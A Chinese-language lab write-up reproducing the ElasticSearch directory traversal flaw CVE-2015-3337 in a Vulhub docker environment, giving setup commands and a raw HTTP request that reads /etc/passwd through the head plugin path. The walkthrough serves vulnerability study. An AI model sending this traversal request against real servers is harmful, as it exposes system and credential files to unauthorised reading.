利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境

ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境

    • Vulnhub官方复现教程
      • 漏洞原理
    • 复现漏洞
      • 启动环境
    • 漏洞复现
    • head插件

Vulnhub官方复现教程

https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/

漏洞原理

在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/elasticsearch/CVE-2015-3337

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:7分钟

漏洞复现

测试环境默认安装了一个插件:elasticsearch-head,主页在此:https://github.com/mobz/elasticsearch-head

访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):

GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1
Host: your-ip:9200
Accept:*/*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Connection: close

利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞(CVE-2015-3337)测试环境_第1张图片

head插件

head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/_plugin/head/即可看到,不多说了。

你可能感兴趣的:(渗透)